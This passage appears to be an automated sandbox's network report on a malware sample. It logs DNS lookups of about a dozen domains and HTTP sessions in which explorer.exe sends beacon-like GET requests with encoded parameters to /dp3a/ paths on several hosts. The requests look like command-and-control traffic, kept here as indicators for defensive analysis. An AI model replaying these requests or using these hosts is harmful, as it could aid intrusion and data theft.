Jun 10, 2021 14:35:26.428174973 CEST	53	53097	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:27.968039989 CEST	49257	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:28.021265984 CEST	53	49257	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:29.130686045 CEST	62389	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:29.181111097 CEST	53	62389	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:30.352375984 CEST	49910	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:30.416027069 CEST	53	49910	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:31.599483967 CEST	55854	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:31.653295994 CEST	53	55854	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:32.837169886 CEST	64549	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:32.889580965 CEST	53	64549	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:34.180674076 CEST	63153	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:34.231314898 CEST	53	63153	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:35.371232986 CEST	52991	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:35.421302080 CEST	53	52991	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:36.581928968 CEST	53700	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:36.633219004 CEST	53	53700	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:38.103169918 CEST	51726	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:38.153357029 CEST	53	51726	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:39.310956955 CEST	56794	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:39.364303112 CEST	53	56794	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:40.492393970 CEST	56534	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:40.552254915 CEST	53	56534	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:41.670697927 CEST	56627	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:41.722903967 CEST	53	56627	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:42.771862030 CEST	56621	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:42.822462082 CEST	53	56621	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:44.090924978 CEST	63116	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:44.141067028 CEST	53	63116	8.8.8.8	192.168.2.4
Jun 10, 2021 14:35:56.428946972 CEST	64078	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:35:56.488899946 CEST	53	64078	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:21.692979097 CEST	64801	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:21.834809065 CEST	53	64801	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:24.749804020 CEST	61721	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:24.812876940 CEST	53	61721	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:25.792799950 CEST	51255	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:25.922239065 CEST	53	51255	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:26.800214052 CEST	61522	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:26.861669064 CEST	53	61522	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:28.283225060 CEST	52337	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:28.344872952 CEST	53	52337	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:28.903923035 CEST	55046	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:28.982779026 CEST	53	55046	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:29.762716055 CEST	49612	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:29.815706968 CEST	53	49612	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:30.577676058 CEST	49285	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:30.639964104 CEST	53	49285	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:31.975476027 CEST	50601	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:32.036520958 CEST	53	50601	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:33.423738956 CEST	60875	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:33.485572100 CEST	53	60875	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:34.775242090 CEST	56448	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:34.838058949 CEST	53	56448	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:34.981436968 CEST	59172	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:35.043040991 CEST	53	59172	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:37.972244978 CEST	62420	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:38.046022892 CEST	53	62420	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:43.774049997 CEST	60579	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:44.115781069 CEST	53	60579	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:49.679228067 CEST	50183	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:49.760195971 CEST	53	50183	8.8.8.8	192.168.2.4
Jun 10, 2021 14:36:54.800163984 CEST	61531	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:36:54.895533085 CEST	53	61531	8.8.8.8	192.168.2.4
Jun 10, 2021 14:37:05.074394941 CEST	49228	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:37:05.138901949 CEST	53	49228	8.8.8.8	192.168.2.4
Jun 10, 2021 14:37:10.570947886 CEST	59794	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:37:10.643258095 CEST	53	59794	8.8.8.8	192.168.2.4
Jun 10, 2021 14:37:13.748724937 CEST	55916	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:37:13.808728933 CEST	53	55916	8.8.8.8	192.168.2.4
Jun 10, 2021 14:37:15.293870926 CEST	52752	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:37:15.361018896 CEST	53	52752	8.8.8.8	192.168.2.4
Jun 10, 2021 14:37:16.292370081 CEST	60542	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:37:16.830492973 CEST	53	60542	8.8.8.8	192.168.2.4
Jun 10, 2021 14:37:22.187328100 CEST	60689	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:37:22.252890110 CEST	53	60689	8.8.8.8	192.168.2.4
Jun 10, 2021 14:37:27.296046019 CEST	64206	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:37:27.346261024 CEST	53	64206	8.8.8.8	192.168.2.4
Jun 10, 2021 14:37:32.951637983 CEST	50904	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:37:33.047657967 CEST	53	50904	8.8.8.8	192.168.2.4
Jun 10, 2021 14:37:38.618782997 CEST	57525	53	192.168.2.4	8.8.8.8
Jun 10, 2021 14:37:38.703188896 CEST	53	57525	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 10, 2021 14:36:37.972244978 CEST	192.168.2.4	8.8.8.8	0xba10	Standard query (0)	www.theyogirunner.com	A (IP address)	IN (0x0001)
Jun 10, 2021 14:36:43.774049997 CEST	192.168.2.4	8.8.8.8	0x2ba3	Standard query (0)	www.kladios.com	A (IP address)	IN (0x0001)
Jun 10, 2021 14:36:49.679228067 CEST	192.168.2.4	8.8.8.8	0x2d28	Standard query (0)	www.letstrumpbiden.com	A (IP address)	IN (0x0001)
Jun 10, 2021 14:36:54.800163984 CEST	192.168.2.4	8.8.8.8	0x9d2	Standard query (0)	www.hireinone.xyz	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:05.074394941 CEST	192.168.2.4	8.8.8.8	0x8470	Standard query (0)	www.closetofaurora.com	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:10.570947886 CEST	192.168.2.4	8.8.8.8	0x25e2	Standard query (0)	www.28ji.site	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:16.292370081 CEST	192.168.2.4	8.8.8.8	0x5589	Standard query (0)	www.kingguardgroup.com	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:22.187328100 CEST	192.168.2.4	8.8.8.8	0xb3ba	Standard query (0)	www.goodlukc.com	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:27.296046019 CEST	192.168.2.4	8.8.8.8	0x4cff	Standard query (0)	www.rebeccannemontgomery.net	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:32.951637983 CEST	192.168.2.4	8.8.8.8	0x24c4	Standard query (0)	www.pecon.pro	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:38.618782997 CEST	192.168.2.4	8.8.8.8	0x1e72	Standard query (0)	www.oilleakgames.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 10, 2021 14:36:38.046022892 CEST	8.8.8.8	192.168.2.4	0xba10	No error (0)	www.theyogirunner.com		104.232.96.207	A (IP address)	IN (0x0001)
Jun 10, 2021 14:36:44.115781069 CEST	8.8.8.8	192.168.2.4	0x2ba3	No error (0)	www.kladios.com		121.254.178.252	A (IP address)	IN (0x0001)
Jun 10, 2021 14:36:49.760195971 CEST	8.8.8.8	192.168.2.4	0x2d28	Name error (3)	www.letstrumpbiden.com	none	none	A (IP address)	IN (0x0001)
Jun 10, 2021 14:36:54.895533085 CEST	8.8.8.8	192.168.2.4	0x9d2	No error (0)	www.hireinone.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)
Jun 10, 2021 14:36:54.895533085 CEST	8.8.8.8	192.168.2.4	0x9d2	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)
Jun 10, 2021 14:36:54.895533085 CEST	8.8.8.8	192.168.2.4	0x9d2	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:05.138901949 CEST	8.8.8.8	192.168.2.4	0x8470	No error (0)	www.closetofaurora.com	closetofaurora.com		CNAME (Canonical name)	IN (0x0001)
Jun 10, 2021 14:37:05.138901949 CEST	8.8.8.8	192.168.2.4	0x8470	No error (0)	closetofaurora.com		162.0.229.108	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:10.643258095 CEST	8.8.8.8	192.168.2.4	0x25e2	No error (0)	www.28ji.site	xn-ciqpnp86gzpj.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Jun 10, 2021 14:37:10.643258095 CEST	8.8.8.8	192.168.2.4	0x25e2	No error (0)	xn-ciqpnp86gzpj.myshopify.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Jun 10, 2021 14:37:10.643258095 CEST	8.8.8.8	192.168.2.4	0x25e2	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:16.830492973 CEST	8.8.8.8	192.168.2.4	0x5589	No error (0)	www.kingguardgroup.com		69.162.102.218	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:22.252890110 CEST	8.8.8.8	192.168.2.4	0xb3ba	Name error (3)	www.goodlukc.com	none	none	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:27.346261024 CEST	8.8.8.8	192.168.2.4	0x4cff	No error (0)	www.rebeccannemontgomery.net		35.205.61.67	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:33.047657967 CEST	8.8.8.8	192.168.2.4	0x24c4	No error (0)	www.pecon.pro		37.48.65.148	A (IP address)	IN (0x0001)
Jun 10, 2021 14:37:38.703188896 CEST	8.8.8.8	192.168.2.4	0x1e72	Name error (3)	www.oilleakgames.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.theyogirunner.com

www.kladios.com

www.hireinone.xyz

www.closetofaurora.com

www.28ji.site

www.kingguardgroup.com

www.rebeccannemontgomery.net

www.pecon.pro

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49756	104.232.96.207	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 14:36:38.251010895 CEST	4634	OUT	GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF HTTP/1.1 Host: www.theyogirunner.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 14:36:38.846438885 CEST	4634	OUT	GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=rT959XFbghPJVv5hpca1PvfPcVCtnqQ7MGzQwkslu+qbfaQ1OXZa8AaW+DloN+T+QKhF HTTP/1.1 Host: www.theyogirunner.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 14:36:39.060780048 CEST	4634	IN	HTTP/1.1 200 OK Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Server: Nginx Microsoft-HTTPAPI/2.0 X-Powered-By: Nginx Date: Thu, 10 Jun 2021 12:36:34 GMT Connection: close Data Raw: 33 0d 0a ef bb bf 0d 0a Data Ascii: 3
Jun 10, 2021 14:36:39.060854912 CEST	4636	IN	Data Raw: 31 30 37 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e5 ae 89 e5 85 a8 e6 a3 80 e6 b5 8b 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c Data Ascii: 1078<!DOCTYPE html><html><head> <title>...</title> <meta charset=UTF-8 /> <meta http-equiv=Cache-Control content=no-siteapp /> <meta http-equiv=Cache-Control content=no-transform /> <meta name=applicab
Jun 10, 2021 14:36:39.060895920 CEST	4637	IN	Data Raw: 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 32 70 78 7d 2e 61 6c 65 72 74 2d 62 74 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f Data Ascii: ff;font-size:20px;text-decoration:none;letter-spacing:2px}.alert-btn:hover{background-color:#ff5656}.alert-footer{margin:0 auto;height:42px;text-align:center;width:100%;margin-bottom:10px}.alert-footer-icon{float:left}.alert-footer-text{float:
Jun 10, 2021 14:36:39.060935020 CEST	4638	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 31 65 30 32 63 35 36 61 66 35 34 32 38 61 36 66 63 61 66 37 33 37 63 34 31 61 38 61 65 37 37 35 22 Data Ascii: hm.src = "https://hm.baidu.com/hm.js?1e02c56af5428a6fcaf737c41a8ae775"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> <script>
Jun 10, 2021 14:36:39.060966015 CEST	4639	IN	Data Raw: 65 6d 65 6e 74 42 79 49 64 28 22 6a 73 2d 61 6c 65 72 74 2d 62 6f 78 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 62 6c 6f 63 6b 22 3b 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 Data Ascii: ementById("js-alert-box").style.display = "block"; document.getElementById("pcon").innerHTML = pcon; document.getElementById("js-alert-head").innerHTML = str1; btn.innerHTML = btnText; </script> <script>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49757	121.254.178.252	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 14:36:44.390893936 CEST	4660	OUT	GET /dp3a/?GR-d=9p/K3n16Mfij3JUlf4zaR/Rujbmkv/CDhZs1M9Rj6A9SEkbuvv/NT9LewVshmGfbFjhm&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1 Host: www.kladios.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 14:36:44.664067984 CEST	4663	IN	HTTP/1.1 404 Not Found Date: Thu, 10 Jun 2021 12:36:44 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 70 33 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dp3a/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49758	85.159.66.93	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 14:36:54.972332954 CEST	4664	OUT	GET /dp3a/?GR-d=gNGby8oVX6PgZB5GWA7CusOGqzi3GywYGs/3OTvKjB1NulubMkWwqj/edMXwHBCob9Lh&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1 Host: www.hireinone.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 14:36:55.049076080 CEST	4666	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET Date: Thu, 10 Jun 2021 12:36:16 GMT Connection: close Content-Length: 1245 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name chang
Jun 10, 2021 14:36:55.049115896 CEST	4666	IN	Data Raw: 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 Data Ascii: ed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49759	162.0.229.108	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 14:37:05.328807116 CEST	4666	OUT	GET /dp3a/?GR-d=gKBh5mJw+OBG/cLQbNfpnnQYqc+45jCeSmhHkERkUIltQJh3+jBq8zykiXiJ5ld+SMHF&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1 Host: www.closetofaurora.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 14:37:05.531295061 CEST	4668	IN	HTTP/1.1 404 Not Found date: Thu, 10 Jun 2021 12:37:05 GMT server: Apache accept-ranges: bytes transfer-encoding: chunked content-type: text/html x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains; preload; referrer-policy: no-referrer-when-downgrade connection: close Data Raw: 31 35 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 0d 0a 32 30 30 42 0d 0a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 